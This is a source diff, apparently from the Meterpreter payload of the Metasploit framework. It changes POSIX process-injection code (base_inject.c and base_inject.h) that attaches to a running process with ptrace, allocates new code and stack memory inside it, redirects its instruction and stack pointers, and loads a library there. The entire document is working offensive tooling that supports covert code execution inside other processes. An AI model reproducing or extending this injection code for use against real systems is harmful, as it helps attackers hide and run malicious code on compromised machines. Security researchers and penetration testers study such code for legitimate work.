Create new code memory

c/meterpreter/source/common/arch/posix/base_inject.c

@@ -84,11 +84,12 @@ save_state(LONG pid, state *s) {
  * @brief Restores the process state and detaches.
  * @param pid Process identifier to restore.
  * @param s Pointer to \c state with code and registers.
+ * @param only_memory Idicates if restore only memory at EIP or also registers
  * @returns Indication of success or failure.
  * @retval 0 Indicates success.
  */
 LONG
-restore_state(LONG pid, state *s) {
+restore_state(LONG pid, state *s, int only_memory) {
 	unsigned long *mem_ptr = NULL;
 	LONG i = 0;
 	LONG result = 0;
@@ -105,6 +106,9 @@ restore_state(LONG pid, state *s) {
 	if (result != 0)
 		return result;
 
+	if (only_memory > 0)
+		return 0;
+
 	result = setregs(pid, &(s->regs));
 	if (result != 0)
 		return result;
@@ -250,6 +254,8 @@ call(LONG pid, struct user_regs_struct *regs, unsigned long addr) {
 LONG
 inject_library(LONG pid, library *l) {
 	state s;
+	long code_mem;
+	long stack_mem;
 	struct user_regs_struct regs;
 	ULONG library_size = _SIZE_OF(l->length);
 	unsigned long *buf_ptr = (unsigned long *)l->data;
@@ -260,7 +266,6 @@ inject_library(LONG pid, library *l) {
 		goto end;
 	}
 
-
 	dprintf("[INJECT] Saving state");
 	result = attach(pid);
 	if (result != 0)
@@ -272,14 +277,31 @@ inject_library(LONG pid, library *l) {
 
 	memcpy(&regs, &(s.regs), sizeof(struct user_regs_struct));
 
+	dprintf("[INJECT] Creating new code memory");
+	result = allocate(pid, &regs, NULL, CODE_SIZE);
+	if (result != 0)
+		goto restore;
+
+	dprintf("[INJECT] New code memory on 0x%x, fixing registers", regs.eax);
+	code_mem = regs.eax;
+	regs.eip = code_mem;
+
+	result = setregs(pid, &regs);
+	if (result != 0)
+		goto restore;
+
+	dprintf("[INJECT] Restoring code on original process");
+	restore_state(pid, &s, 1);
+
 	dprintf("[INJECT] Creating new stack");
-  result = allocate(pid, &regs, NULL, STACK_SIZE); 
+  	result = allocate(pid, &regs, NULL, STACK_SIZE);
 	if (result != 0)
 		goto restore;
 
 	dprintf("[INJECT] New stack on 0x%x, fixing registers", regs.eax);
-	regs.esp = regs.eax + STACK_SIZE;
-	regs.eip = s.regs.eip; 
+	stack_mem = regs.eax + STACK_SIZE;
+	regs.esp = stack_mem;//regs.eax + STACK_SIZE;
+	regs.eip = code_mem;//s.regs.eip;
 
 	result = setregs(pid, &regs);
 	if (result != 0)
@@ -301,7 +323,8 @@ inject_library(LONG pid, library *l) {
 		goto restore;	
 
 	dprintf("[INJECT] Fixing registers");
-	regs.eip = s.regs.eip;
+	regs.esp = stack_mem;
+	regs.eip = code_mem;//s.regs.eip;
 	result = setregs(pid, &regs);
 	if (result != 0)
 		goto restore;
@@ -316,7 +339,7 @@ inject_library(LONG pid, library *l) {
 	goto end;	
 
 restore:
-	restore_state(pid, &s);
+	restore_state(pid, &s, 0);
 end:	
 	return result;
 }

c/meterpreter/source/common/arch/posix/base_inject.h

@@ -31,6 +31,8 @@
 #define ENTRY_POINT_POS 11
 /*! Length of the new stack to allocate */
 #define STACK_SIZE 0x200000
+/*! Length of the new memory to store code stubs */
+#define CODE_SIZE 0x1000
 
 /*! @brief Container struct for a library to inject and execute. */
 typedef struct {
@@ -52,7 +54,7 @@ typedef struct {
 } state;
 	
 LONG save_state(LONG pid, state *s);
-LONG restore_state(LONG pid, state *s);
+LONG restore_state(LONG pid, state *s, int only_memory);
 BOOL wait_trap(LONG pid);
 LONG execute_stub(LONG pid, unsigned long addr, unsigned long *stub, ULONG stub_size);
 LONG allocate(LONG pid, struct user_regs_struct *regs, unsigned long addr, size_t length);